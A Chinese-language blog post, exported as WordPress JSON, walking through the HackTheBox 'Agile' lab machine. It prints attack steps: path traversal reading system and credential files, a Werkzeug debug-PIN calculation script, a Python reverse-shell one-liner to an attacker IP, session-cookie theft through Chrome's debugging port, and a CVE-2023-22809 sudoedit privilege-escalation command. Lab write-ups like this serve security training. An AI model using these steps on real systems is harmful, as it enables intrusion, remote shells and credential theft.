{"id":870,"date":"2023-08-06T16:38:12","date_gmt":"2023-08-06T08:38:12","guid":{"rendered":"http:\/\/119.45.47.125\/?p=870"},"modified":"2023-08-06T16:39:13","modified_gmt":"2023-08-06T08:39:13","slug":"hackthebox-agile","status":"publish","type":"post","link":"http:\/\/119.45.47.125\/index.php\/2023\/08\/06\/hackthebox-agile\/","title":{"rendered":"HackTheBox-Agile"},"content":{"rendered":"

\u914d\u7f6e\u5b8c\u540e\u6ce8\u518c\u4e2a\u8d26\u53f7\uff0c\u8fdb\u5165\u5230 \/vault<\/code><\/p>\n

\"\"<\/div>\n

\u53d1\u73b0\u6709\u5bfc\u51fa\u529f\u80fd\uff0c\u62e6\u622a\u4e00\u4e0b\uff0c\u89c2\u5bdf\u5230\u8df3\u8f6c\u5230 \/download<\/code> \u4e0b\u6267\u884c<\/p>\n

\"\"<\/div>\n

\u8ddf\u8e2a\u8fc7\u53bb\u53d1\u73b0\u518d\u53d1\u5305\u4f1a\u8fd4\u56de\u6587\u4ef6\u4e0d\u5b58\u5728 \/tmp\/...<\/code>\uff0c\u5c1d\u8bd5\u76ee\u5f55\u7a7f\u8d8a\u8bfb \/etc\/passwd<\/code><\/p>\n

\"\"<\/div>\n

\u5148\u8bfb\u4e00\u4e0b \/proc\/self\/cmdline<\/code><\/p>\n

\/app\/venv\/bin\/python3 \/app\/venv\/bin\/gunicorn --bind 127.0.0.1:5000 --thread=10 --timeout 600 wsgi:app\n<\/code><\/pre>\n
\u56e0\u4e3a\u662f python \u7684\u7ad9\u70b9\uff0c\u8003\u8651\u8bfb\u6e90\u7801\uff0c\u901a\u8fc7\u62a5\u9519\uff0c\u53ef\u4ee5\u5f97\u5230\u51e0\u4e2a\u8def\u5f84<\/p>\n
\/app\/venv\/lib\/python3.10\/site-packages\/flask\/app.py\n\/app\/venv\/lib\/python3.10\/site-packages\/flask_login\/utils.py\n\/app\/app\/superpass\/views\/vault_views.py\n<\/code><\/pre>\n
\u6700\u540e\u4e00\u4e2a\u770b\u7740\u50cf\u662f\u5de5\u4f5c\u76ee\u5f55\uff0c\u4ece \/app\/app\/superpass<\/code> \u5f00\u59cb\u904d\u5386\u4e00\u4e0b\u5e38\u89c1\u7684 python \u6587\u4ef6\uff0c\u8bfb\u5230 \/app\/app\/superpass\/app.py<\/code><\/p>\n
import json\nimport os\nimport sys\nimport flask\nimport jinja_partials\nfrom flask_login import LoginManager\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\nfrom superpass.infrastructure.view_modifiers import response\nfrom superpass.data import db_session\n\napp = flask.Flask(__name__)\napp.config['SECRET_KEY'] = os.urandom(32)\n\ndef register_blueprints():\n    from superpass.views import home_views\n    from superpass.views import vault_views\n    from superpass.views import account_views\n\n    app.register_blueprint(home_views.blueprint)\n    app.register_blueprint(vault_views.blueprint)\n    app.register_blueprint(account_views.blueprint)\n\ndef setup_db():\n    db_session.global_init(app.config['SQL_URI'])\n\ndef configure_login_manager():\n    login_manager = LoginManager()\n    login_manager.login_view = 'account.login_get'\n    login_manager.init_app(app)\n\n    from superpass.data.user import User\n\n    @login_manager.user_loader\n    def load_user(user_id):\n        from superpass.services.user_service import get_user_by_id\n        return get_user_by_id(user_id)\n\ndef configure_template_options():\n    jinja_partials.register_extensions(app)\n    helpers = {\n        'len': len,\n        'str': str,\n        'type': type,\n    }\n    app.jinja_env.globals.update(**helpers)\n\ndef load_config():\n    config_path = os.getenv(\"CONFIG_PATH\")\n    with open(config_path, 'r') as f:\n        for k, v in json.load(f).items():\n            app.config[k] = v\n\ndef configure():\n    load_config()\n    register_blueprints()\n    configure_login_manager()\n    setup_db()\n    configure_template_options()\n\ndef enable_debug():\n    from werkzeug.debug import DebuggedApplication\n    app.wsgi_app = DebuggedApplication(app.wsgi_app, True)\n    app.debug = True\n\ndef main():\n    enable_debug()\n    configure()\n    app.run(debug=True)\n\ndef dev():\n    configure()\n    app.run(port=5555)\n\nif __name__ == '__main__':\n    main()\nelse:\n    configure()\n<\/code><\/pre>\n
\u8fd8\u6709\u5c31\u662f vault_views.py<\/code><\/p>\n
import flask\nimport subprocess\nfrom flask_login import login_required, current_user\nfrom superpass.infrastructure.view_modifiers import response\nimport superpass.services.password_service as password_service\nfrom superpass.services.utility_service import get_random\nfrom superpass.data.password import Password\n\nblueprint = flask.Blueprint('vault', __name__, template_folder='templates')\n\n@blueprint.route('\/vault')\n@response(template_file='vault\/vault.html')\n@login_required\ndef vault():\n    passwords = password_service.get_passwords_for_user(current_user.id)\n    print(f'{passwords=}')\n    return {'passwords': passwords}\n\n@blueprint.get('\/vault\/add_row')\n@response(template_file='vault\/partials\/password_row_editable.html')\n@login_required\ndef add_row():\n    p = Password()\n    p.password = get_random(20)\n    return {\"p\": p}\n\n@blueprint.get('\/vault\/edit_row\/<id>')\n@response(template_file='vault\/partials\/password_row_editable.html')\n@login_required\ndef get_edit_row(id):\n    password = password_service.get_password_by_id(id, current_user.id)\n\n    return {\"p\": password}\n\n@blueprint.get('\/vault\/row\/<id>')\n@response(template_file='vault\/partials\/password_row.html')\n@login_required\ndef get_row(id):\n    password = password_service.get_password_by_id(id, current_user.id)\n\n    return {\"p\": password}\n\n@blueprint.post('\/vault\/add_row')\n@login_required\ndef add_row_post():\n    r = flask.request\n    site = r.form.get('url', '').strip()\n    username = r.form.get('username', '').strip()\n    password = r.form.get('password', '').strip()\n\n    if not (site or username or password):\n        return ''\n\n    p = password_service.add_password(site, username, password, current_user.id)\n    return flask.render_template('vault\/partials\/password_row.html', p=p)\n\n@blueprint.post('\/vault\/update\/<id>')\n@response(template_file='vault\/partials\/password_row.html')\n@login_required\ndef update(id):\n    r = flask.request\n    site = r.form.get('url', '').strip()\n    username = r.form.get('username', '').strip()\n    password = r.form.get('password', '').strip()\n\n    if not (site or username or password):\n        flask.abort(500)\n\n    p = password_service.update_password(id, site, username, password, current_user.id)\n\n    return {\"p\": p}\n\n@blueprint.delete('\/vault\/delete\/<id>')\n@login_required\ndef delete(id):\n    password_service.delete_password(id, current_user.id)\n    return ''\n\n@blueprint.get('\/vault\/export')\n@login_required\ndef export():\n    if current_user.has_passwords:        \n        fn = password_service.generate_csv(current_user)\n        return flask.redirect(f'\/download?fn={fn}', 302)\n    return \"No passwords for user\"\n\n@blueprint.get('\/download')\n@login_required\ndef download():\n    r = flask.request\n    fn = r.args.get('fn')\n    with open(f'\/tmp\/{fn}', 'rb') as f:\n        data = f.read()\n    resp = flask.make_response(data)\n    resp.headers['Content-Disposition'] = 'attachment; filename=superpass_export.csv'\n    resp.mimetype = 'text\/csv'\n    return resp\n<\/code><\/pre>\n
\u5176\u4ed6\u7684\u6587\u4ef6\u90fd\u662f\u53ef\u4ee5\u901a\u8fc7 from \u6216\u662f import \u91cc\u7684\u4fe1\u606f\u8bfb\u51fa\u6765<\/p>\n
\n
\u8c8c\u4f3c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7 \/vault\/row\/<id><\/code> \u8fd9\u4e2a\u8def\u7531\u8bfb\u53d6\u5176\u4ed6\u7528\u6237\u7684 id\uff0c\u5305\u62ec\u6211\u5728\u505a\u5b8c\u4e4b\u540e\u641c\u7f51\u4e0a\u5176\u4ed6\u5e08\u5085\u7684 wp \u4e5f\u6709\u8fd9\u4e48\u8bf4\u7684\uff0c\u8fd9\u53ef\u80fd\u662f\u4e4b\u524d\u7684\u4e00\u4e2a bug\uff0c\u4f46\u662f\u73b0\u5728\u80af\u5b9a\u662f\u4e0d\u884c\u7684\uff0c\u53ea\u80fd\u901a\u8fc7\u8fd9\u4e2a\u8def\u7531\u67e5\u8be2\u81ea\u5df1\u6dfb\u52a0\u8fc7\u7684<\/p>\n
\u56e0\u4e3a\u4ee3\u7801\u91cc\u5199\u7684\u5f88\u6e05\u695a<\/p>\n
password_service.get_password_by_id(id, current_user.id)\n<\/code><\/pre>\n
\u7136\u540e\u518d\u53bb\u8bfb get_password_by_id()<\/code> \u8fd9\u4e2a\u51fd\u6570<\/p>\n
#\/app\/app\/superpass\/services\/password_service.py\n\ndef get_password_by_id(id: int, userid: int) -> Optional[Password]:\n\n    session = db_session.create_session()\n    password = session.query(Password)\\\n        .filter(\n            Password.id == id,\n            Password.user_id == userid\n        ).first()\n\n    session.close()\n\n    return password\n<\/code><\/pre>\n
\u4e5f\u5c31\u662f\u8bf4\u53ea\u6709 Password.id<\/code> \u548c Password.user_id<\/code> \u4e24\u4e2a\u6761\u4ef6\u540c\u65f6\u6ee1\u8db3\u7684\u65f6\u5019\u624d\u4f1a\u8fd4\u56de password<\/code> \u503c\uff0c\u4f46\u662f\u4e8b\u5b9e\u4e0a\u4f20\u8fdb\u6765\u7684 Password.user_id<\/code> \u662f\u5728 \/vault\/add_row<\/code> \u8fd9\u4e2a\u8def\u7531\u4e0b\u6dfb\u52a0\u7684\u65f6\u5019\u901a\u8fc7 session<\/code> \u5199\u6b7b\u7684\uff0c\u6240\u4ee5\u53ea\u80fd\u67e5\u81ea\u5df1 session<\/code> \u6dfb\u52a0\u8fc7\u7684\uff0c\u4e0d\u80fd\u67e5\u522b\u4eba\u7684<\/p>\n
\"\"<\/div>\n
\u90a3\u4e48\u80fd\u4e0d\u80fd\u5728\u67e5\u8be2\u7684\u8def\u7531\u4e0b\u4f2a\u9020 session<\/code> \u5462\uff0c\u5e94\u8be5\u662f\u4e0d\u884c\u7684\uff0c\u56e0\u4e3a app.config['SECRET_KEY'] = os.urandom(32)<\/code> \u91cc\u5199\u4e86 SECRET_KEY<\/code> \u662f\u968f\u673a\u751f\u6210\u7684\uff08\u5f53\u7136\u4e5f\u53ef\u4ee5\u5c1d\u8bd5\u5229\u7528 flask-unsign<\/code> \u8fdb\u884c\u7206\u7834\uff0c\u4f46\u662f\u5e76\u4e0d\u4f1a\u7206\u7834\u51fa\u6765\uff09<\/p>\n
\u6211\u4e5f\u5c1d\u8bd5\u8bfb\u53d6\u4e86\u73af\u5883\u53d8\u91cf \/proc\/self\/environ<\/code><\/p>\n
LANG=C.UTF-8\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/snap\/bin\nHOME=\/var\/www\nLOGNAME=www-data\nUSER=www-data\nINVOCATION_ID=3c074000b6b043829b35b3f4f97c8acf\nJOURNAL_STREAM=8:32205\nSYSTEMD_EXEC_PID=1076\nCONFIG_PATH=\/app\/config_prod.json\n\n#\/app\/config_prod.json\n{\"SQL_URI\": \"mysql+pymysql:\/\/superpassuser:dSA6l7q*yIVs$39Ml6ywvgK@localhost\/superpass\"}\n<\/code><\/pre>\n
\n
\u5f53\u524d\u73af\u5883\u4e0b\u4e5f\u4e0d\u5b58\u5728 SSTI \u5229\u7528\u7684\u53ef\u80fd\uff0c\u90a3\u5c31\u53ea\u80fd\u8003\u8651\u62a5\u9519\u65f6\u51fa\u73b0\u7684 PIN \u7801\u7684\u5229\u7528\u4e86\uff1b\u4ee5\u524d\u6253 CTF \u6bd4\u8d5b\u7684\u65f6\u5019\u9047\u5230\u8fc7\uff0c\u9700\u8981\u83b7\u53d6\u51e0\u4e2a\u503c\uff0c\u6e90\u7801\u53ef\u4ee5\u8bfb \/app\/venv\/lib\/python3.10\/site-packages\/werkzeug\/debug\/init<\/strong>.py<\/code><\/p>\n
# machine-id is stable across boots, boot_id is not.\n        for filename in \"\/etc\/machine-id\", \"\/proc\/sys\/kernel\/random\/boot_id\":\n            try:\n                with open(filename, \"rb\") as f:\n                    value = f.readline().strip()\n            except OSError:\n                continue\n\n            if value:\n                linux += value\n                break\n\n        # Containers share the same machine id, add some cgroup\n        # information. This is used outside containers too but should be\n        # relatively stable across boots.\n        try:\n            with open(\"\/proc\/self\/cgroup\", \"rb\") as f:\n                linux += f.readline().strip().rpartition(b\"\/\")[2]\n        except OSError:\n            pass\n\n        if linux:\n            return linux\n<\/code><\/pre>\n
\u8fd9\u91cc\u4e3b\u8981\u662f machine-id<\/code> \u7684\u95ee\u9898\uff0c\u53ef\u4ee5\u770b\u51fa\u6765\u6700\u540e\u5f97\u5230\u7684\u503c\uff0c\u662f\u7531\u4e24\u90e8\u5206\u7ec4\u6210\uff0c\u524d\u9762\u662f \/etc\/machine-id<\/code> \u6216\u662f \/proc\/sys\/kernel\/random\/boot_id<\/code> \u7684\u503c\uff0c\u540e\u9762\u662fproc\/self\/cgroup<\/code> \u91cc\u9762\u7b2c\u4e8c\u4e2a \/<\/code> \u540e\u7684\u503c<\/p>\n
ed5b159560f54721827644bc9b220d00 #\/etc\/machine-id\nb60932b0-b65b-4d64-a4ce-c184f981b791 #\/proc\/sys\/kernel\/random\/boot_id\n0::\/system.slice\/superpass.service #\/proc\/self\/cgroup\n<\/code><\/pre>\n
username #\u8fd0\u884cflask\u6240\u767b\u5f55\u7684\u7528\u6237\u540d --> www-data\nmodname #\u4e00\u822c\u9ed8\u8ba4\u4e3a --> flask.app\ngetattr(app, '__name__', getattr(app.__class__, '__name__')) #\u4e00\u822c\u60c5\u51b5\u4e0b\u4e3a Flask\uff0c\u4f46\u662f\u8fd9\u91cc\u7ecf\u8fc7\u6d4b\u8bd5\u662f wsgi_app\ngetattr(mod, '__file__', None) #\/app\/venv\/lib\/python3.10\/site-packages\/flask\/app.py\nget_machine_id() #\/etc\/machine-id --> ed5b159560f54721827644bc9b220d00superpass.service\nstr(uuid.getnode() #\/sys\/class\/net\/eth0\/address \u8f6c\u5341\u8fdb\u5236 -->345052363254\n<\/code><\/pre>\n
\u6700\u540e\u6539\u4e2a\u811a\u672c\u8ba1\u7b97\u5c31\u53ef\u4ee5<\/p>\n
import hashlib\nfrom itertools import chain\nprobably_public_bits = [\n    'www-data',# username\n    'flask.app',# modname\n    'wsgi_app',# getattr(app, '__name__', getattr(app.__class__, '__name__'))\n    '\/app\/venv\/lib\/python3.10\/site-packages\/flask\/app.py' # getattr(mod, '__file__', None),\n]\n\nprivate_bits = [\n    '345052363254',# str(uuid.getnode()),  \/sys\/class\/net\/ens33\/address\n    'ed5b159560f54721827644bc9b220d00superpass.service'# get_machine_id(), \/etc\/machine-id\n]\n\nh = hashlib.sha1()\nfor bit in chain(probably_public_bits, private_bits):\n    if not bit:\n        continue\n    if isinstance(bit, str):\n        bit = bit.encode('utf-8')\n    h.update(bit)\nh.update(b'cookiesalt')\n\ncookie_name = '__wzd' + h.hexdigest()[:20]\n\nnum = None\nif num is None:\n    h.update(b'pinsalt')\n    num = ('%09d' % int(h.hexdigest(), 16))[:9]\n\nrv = None\nif rv is None:\n    for group_size in 5, 4, 3:\n        if len(num) % group_size == 0:\n            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')\n                          for x in range(0, len(num), group_size))\n            break\n    else:\n        rv = num\n\nprint(rv)\n<\/code><\/pre>\n
\u8fdb\u5165\u4ee5\u540e\u76f4\u63a5 kali \u8d77\u76d1\u542c\uff0c\u5f39 shell \u56de\u6765<\/p>\n
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.11\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"sh\")\n\n<\/code><\/pre>\n
\"\"<\/div>\n
\u56e0\u4e3a\u521a\u521a\u8bfb\u5230\u4e86 \/app\/config_prod.json<\/code>\uff0c\u6240\u4ee5\u53ef\u4ee5\u5c1d\u8bd5 mysql \u8fde\u63a5<\/p>\n
mysql> use superpass;\nmysql> select * from passwords;\nselect * from passwords;\n+----+---------------------+---------------------+----------------+----------+----------------------+---------+\n| id | created_date        | last_updated_data   | url            | username | password             | user_id |\n+----+---------------------+---------------------+----------------+----------+----------------------+---------+\n|  3 | 2022-12-02 21:21:32 | 2022-12-02 21:21:32 | hackthebox.com | 0xdf     | 762b430d32eea2f12970 |       1 |\n|  4 | 2022-12-02 21:22:55 | 2022-12-02 21:22:55 | mgoblog.com    | 0xdf     | 5b133f7a6a1c180646cb |       1 |\n|  6 | 2022-12-02 21:24:44 | 2022-12-02 21:24:44 | mgoblog        | corum    | 47ed1e73c955de230a1d |       2 |\n|  7 | 2022-12-02 21:25:15 | 2022-12-02 21:25:15 | ticketmaster   | corum    | 9799588839ed0f98c211 |       2 |\n|  8 | 2022-12-02 21:25:27 | 2022-12-02 21:25:27 | agile          | corum    | 5db7caa1d13cc37c9fc2 |       2 |\n+----+---------------------+---------------------+----------------+----------+----------------------+---------+\n5 rows in set (0.00 sec)\n\n<\/code><\/pre>\n
\u5c1d\u8bd5 SSH \u767b\u5f55\uff0c\u672c\u673a\u5f00\u4e2a http.server\uff0ccurl \u4e0b\u8f7d\u4e0b\u6765 pspy64 \u548c linpeas.sh\uff0c\u4f46\u662f\u4e0b\u8f7d\u5230 \/tmp \u8fc7\u4f1a\u5c31\u6ca1\u4e86\u2026\u2026\uff0c\u6362\u4e2a\u76ee\u5f55\u6267\u884c<\/p>\n
\"\"<\/div>\n
\u8d77\u4e86\u4e2a chrome\uff0c\u518d\u770b\u4e0b\u7aef\u53e3\u4f7f\u7528\u60c5\u51b5<\/p>\n
\"\"<\/div>\n
SSH \u53cd\u8fde\u4e0b\u8fdc\u7aef\u8c03\u8bd5\u7aef\u53e3 41829 \u5230\u672c\u5730\uff0c\u8bbf\u95ee\u662f\u4e2a\u7a7a\u9875\u9762<\/p>\n
ssh -L 8099:127.0.0.1:41829 corum@superpass.htb\n<\/code><\/pre>\n
\"\"<\/div>\n
\u626b\u4e86\u4e0b\u76ee\u5f55\u53d1\u73b0\u6709\u4e2a \/json<\/code><\/p>\n
\"\"<\/div>\n
websocat \u8fde\u63a5<\/p>\n
.\/websocat -v ws:\/\/127.0.0.1:8099\/devtools\/page\/7B81BC45AE6474AC340BC92CF349549B\n<\/code><\/pre>\n
\u901a\u8fc7\u524d\u9762\u7684\u6e17\u900f\u6d41\u7a0b\u77e5\u9053\uff0c\u7528\u6237\u5bc6\u7801\u7684\u83b7\u53d6\u662f\u4f9d\u636e\u767b\u5f55\u8d26\u6237\u7684 session<\/code> \u4fe1\u606f\u83b7\u5f97\u7684\uff0c\u6240\u4ee5\u4ee5\u83b7\u53d6\u5f53\u524d\u7aef\u53e3\u670d\u52a1\u4e0b\u7684 session<\/code> \u4e3a\u76ee\u6807<\/p>\n
{\"id\":1,\"method\":\"Network.getAllCookies\"}\n{\"id\":1,\"result\":{\"cookies\":[{\"name\":\"remember_token\",\"value\":\"1|13a30af570feca141af42e12626bbcc4fa5c0d51cd6712db117d79cb9258f2690b7927797fafef273d5e35ad3ed1a592eef2c806b4234789c7cf38356440934e\",\"domain\":\"test.superpass.htb\",\"path\":\"\/\",\"expires\":1722828663.628752,\"size\":144,\"httpOnly\":true,\"secure\":false,\"session\":false,\"priority\":\"Medium\",\"sameParty\":false,\"sourceScheme\":\"NonSecure\",\"sourcePort\":80},{\"name\":\"session\",\"value\":\".eJwlzjkOwjAQAMC_uKbYy2snn0HeS9AmpEL8HSTmBfNu9zryfLT9dVx5a_dntL1x6FxEI2cX1lATrF6KSgYjJDcv24LSRQu2bqQwPXGymkPMEIMAjpDRO6DjcqqZqoOjWBxRQYEsmXHgxCUhsNzTRhh2kvaLXGce_w22zxef3y7n.ZM8T9w.-w4P5Pdo7Kde4PTo_7dI845Ajyg\",\"domain\":\"test.superpass.htb\",\"path\":\"\/\",\"expires\":-1,\"size\":215,\"httpOnly\":true,\"secure\":false,\"session\":true,\"priority\":\"Medium\",\"sameParty\":false,\"sourceScheme\":\"NonSecure\",\"sourcePort\":80}]}}\n<\/code><\/pre>\n
\u5f97\u5230 session<\/code> \u540e\u9700\u8981\u627e\u5230\u7ad9\u70b9\u767b\u5f55\uff0c\u6070\u597d\u4e4b\u524d\u4fe1\u606f\u6536\u96c6\u7684\u65f6\u5019\u5f97\u5230\u4e86\u4fe1\u606f<\/p>\n
\"\"<\/div>\n
SSH \u53cd\u8fde 5555 \u56de\u6765\uff0c\u76f4\u63a5\u66ff\u6362 session<\/code><\/p>\n
\"\"<\/div>\n
SSH \u518d\u767b\u9646 edwards:d07867c6267dcb5df0af<\/code>\uff0csudo -l<\/code> \u5148\u770b\u4e0b<\/p>\n
Matching Defaults entries for edwards on agile:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser edwards may run the following commands on agile:\n    (dev_admin : dev_admin) sudoedit \/app\/config_test.json\n    (dev_admin : dev_admin) sudoedit \/app\/app-testing\/tests\/functional\/creds.txt\n<\/code><\/pre>\n
pspy64 \u6536\u96c6\u5b9a\u65f6\u4efb\u52a1\u4fe1\u606f\uff0c\u4ee5 root \u6743\u9650\u6267\u884c\u6587\u4ef6 \/app\/venv\/bin\/activate<\/code><\/p>\n
\"\"<\/div>\n
\u540c\u65f6\u4e5f\u80fd\u770b\u5230\u5b9a\u671f\u6e05\u9664 \/tmp \u4e0b\u6587\u4ef6<\/p>\n
\"\"<\/div>\n
\u6240\u4ee5\u601d\u8def\u5176\u5b9e\u8fd8\u662f\u4fee\u6539\u8fd9\u4e2a\u6587\u4ef6\u8fbe\u5230\u63d0\u6743\u7684\u76ee\u7684\uff0c\u4f46\u662f\u5f53\u524d\u7528\u6237\u5e76\u4e0d\u80fd\u4fee\u6539\u8fd9\u4e2a\u6587\u4ef6<\/p>\n
edwards@agile:~$ ls -al \/app\/venv\/bin\/activate\n-rw-rw-r-- 1 root dev_admin 1976 Aug  6 08:24 \/app\/venv\/bin\/activate\n<\/code><\/pre>\n
\u60f3\u5230\u521a\u521a sudo -l<\/code> \u4e0b\u51fa\u73b0\u7684 sudoedit<\/code>\uff0cgoogle \u4e00\u4e0b\u770b\u770b\u4e0d\u80fd\u5229\u7528\uff0c\u627e\u5230\u4e86 CVE-2023-22809<\/a><\/p>\n
\u76f4\u63a5\u5229\u7528<\/p>\n
sudo -u dev_admin EDITOR='vim -- \/app\/venv\/bin\/activate' sudoedit \/app\/config_test.json\n<\/code><\/pre>\n
\u6dfb\u52a0\u53ef\u4ee5\u63d0\u6743\u7684\u547d\u4ee4\uff0c\u4fdd\u5b58\u540e\u7b49\u4f1a\u5c31\u884c<\/p>\n
\"\"<\/div>","protected":false},"excerpt":{"rendered":"\u914d\u7f6e\u5b8c\u540e\u6ce8\u518c\u4e2a\u8d26\u53f7\uff0c\u8fdb\u5165\u5230 \/vault \u53d1\u73b0\u6709\u5bfc\u51fa\u529f\u80fd\uff0c\u62e6\u622a\u4e00\u4e0b\uff0c\u89c2\u5bdf\u5230\u8df3\u8f6c\u5230 \/download \u4e0b\u6267\u884c  […]","protected":false},"author":1,"featured_media":897,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[35,26],"tags":[36],"class_list":["post-870","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hackthebox","category-study","tag-hackthebox"],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/119.45.47.125\/wp-content\/uploads\/2023\/08\/1691311062-%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20230806163723.png?fit=1560%2C296","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts\/870","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/comments?post=870"}],"version-history":[{"count":13,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts\/870\/revisions"}],"predecessor-version":[{"id":898,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts\/870\/revisions\/898"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/media\/897"}],"wp:attachment":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/media?parent=870"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/categories?post=870"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/tags?post=870"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}